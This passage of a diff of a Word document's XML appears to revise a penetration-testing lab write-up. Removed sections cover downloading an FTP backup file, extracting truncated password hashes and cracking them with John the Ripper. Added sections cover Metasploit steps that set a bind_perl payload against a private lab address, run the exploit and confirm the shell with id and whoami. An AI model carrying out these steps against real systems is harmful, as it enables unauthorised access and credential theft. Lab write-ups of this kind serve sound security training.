+            <wp:extent cx="5731510" cy="3000375"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
+            <wp:docPr id="1912453998" name="Picture 34"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -6385,11 +6610,17 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="234193362" name=""/>
+                    <pic:cNvPr id="1912453998" name="Picture 1912453998"/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId12"/>
+                    <a:blip r:embed="rId13" cstate="print">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -6397,7 +6628,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5731510" cy="3001645"/>
+                      <a:ext cx="5731510" cy="3000375"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -6424,15 +6655,15 @@
     <w:p>
       <w:pPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="0"/>
+        <w:outlineLvl w:val="1"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
           <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
@@ -6443,13 +6674,13 @@
           <w:b/>
           <w:bCs/>
           <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Exploring FTP Files</w:t>
+          <w:kern w:val="0"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Configuring the Exploit</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6469,27 +6700,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>After logging into FTP, the directory contents were listed.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Command:</w:t>
+        <w:t>Set target IP:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6535,7 +6746,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>ls</w:t>
+        <w:t>set RHOSTS 172.20.10.2</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6555,7 +6766,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>A file named:</w:t>
+        <w:t>View payloads:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6601,7 +6812,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>backup</w:t>
+        <w:t>show payloads</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6621,141 +6832,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>was discovered.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51007D02" wp14:editId="1AC89BA2">
-            <wp:extent cx="5000000" cy="3647619"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="2032886848" name="Picture 1"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="2032886848" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId13"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5000000" cy="3647619"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Downloading the Backup File</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>The file was downloaded using the FTP client.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Command:</w:t>
+        <w:t>Select payload:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6801,7 +6878,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>get backup</w:t>
+        <w:t>set payload cmd/unix/bind_perl</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6816,34 +6893,14 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>The transfer was completed successfully.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
           <w:noProof/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51B6A6CD" wp14:editId="6729F284">
-            <wp:extent cx="5266667" cy="5019048"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="594838691" name="Picture 1"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28F7E693" wp14:editId="3D712470">
+            <wp:extent cx="5731510" cy="4232275"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
+            <wp:docPr id="1294687377" name="Picture 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -6851,7 +6908,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="594838691" name=""/>
+                    <pic:cNvPr id="1294687377" name=""/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
@@ -6863,7 +6920,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5266667" cy="5019048"/>
+                      <a:ext cx="5731510" cy="4232275"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -6890,15 +6947,15 @@
     <w:p>
       <w:pPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="0"/>
+        <w:outlineLvl w:val="1"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
           <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
@@ -6909,33 +6966,13 @@
           <w:b/>
           <w:bCs/>
           <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Extracting Credentials</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>The downloaded file was opened locally.</w:t>
+          <w:kern w:val="0"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Running the Exploit</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7001,7 +7038,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>cat backup</w:t>
+        <w:t>exploit</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7021,7 +7058,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>The file contained several encrypted credentials including hashes for different services.</w:t>
+        <w:t>The exploit successfully connected and opened a shell.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7036,12 +7073,115 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Example entries:</w:t>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79298D9D" wp14:editId="20314717">
+            <wp:extent cx="5731510" cy="2611120"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
+            <wp:docPr id="642281539" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="642281539" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId15"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5731510" cy="2611120"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:outlineLvl w:val="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="36"/>
+          <w:sz w:val="48"/>
+          <w:szCs w:val="48"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="36"/>
+          <w:sz w:val="48"/>
+          <w:szCs w:val="48"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Gaining Initial Access</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>After exploitation, a shell session was obtained.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Verification:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7087,7 +7227,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>office: $6$...</w:t>
+        <w:t>id</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7101,76 +7241,7 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
         <w:br/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>dataCenter</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>: $6$...</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>sky: $6$...</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>sunset: $6$...</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>space: $6$...</w:t>
+        <w:t>whoami</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7185,146 +7256,12 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32479FAB" wp14:editId="4370B979">
-            <wp:extent cx="5731510" cy="1017905"/>
-            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
-            <wp:docPr id="101789394" name="Picture 1"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="101789394" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId15"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5731510" cy="1017905"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Password Cracking</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">To obtain valid credentials, the extracted hashes were saved to a file and cracked using </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>John the Ripper</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
